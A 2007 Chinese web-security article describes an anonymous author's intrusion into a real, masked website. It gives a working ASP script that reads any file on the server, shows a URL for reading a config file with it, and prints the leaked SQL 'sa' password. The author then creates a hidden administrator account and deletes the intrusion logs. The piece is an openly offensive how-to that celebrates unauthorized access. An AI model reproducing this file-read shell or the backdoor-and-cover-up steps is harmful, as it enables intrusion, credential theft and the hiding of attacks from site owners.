| 我是如何突破一流检测系统的 |
|
| 作者:佚名 来源:安全在线
更新时间:2007-9-23 8:46:53 【字体:小
大】 |
|
<%=(int(rnd()*1)+1)%>您当前的位置:中国安全在线cnsafer.com 请进入[技术论坛]发表评论 攻击目标:www.***.com
测试过的动作,一句话马,加密马,等。
测试结果:无效,无法上传,无法进入系统。
经过2天的分析,
然后自己搞出了一个代码,利用此代码读取了该网站下的config.asp文件源代码
<%
file=Request("file")
SetFSOOBJ=Server.CreateObject("Scripting.FileSystemObject")
ifFSOOBJ.fileExists(file)then
Setmyfile=FSOOBJ.opentextfile(file,1)
Response.write"<pre>"&server.HTMLEncode(myfile.readall)&"</pre>"
myfile.close
Setmyfile=nothing
else
Response.write"file("&file&")notexists."
endif
%>
http://www.***.com/view.asp?file=D:\wwwroot\index.asp
读取到的敏感内容
sql地址:***.***.***.***
帐号:sa密码:u8f2444f
利用此帐号进入后,建立了123$的隐藏管理员用户,删除入侵日志后退出。
您对本文章有什么意见或着疑问吗?请到论坛讨论您的关注和建议是我们前行的参考和动力 |
| 文章录入:ls1238 责任编辑:ls1238
|
|
上一篇文章: 另类注射攻击——cookie注射
下一篇文章: 黑客攻击技术WEB网站入侵的过程 |
| 【字体:小
大】【发表评论】【加入收藏】【告诉好友】【打印此文】【关闭窗口】
|
网友评论:(只显示最新10条。评论内容只代表网友观点,与本站立场无关!)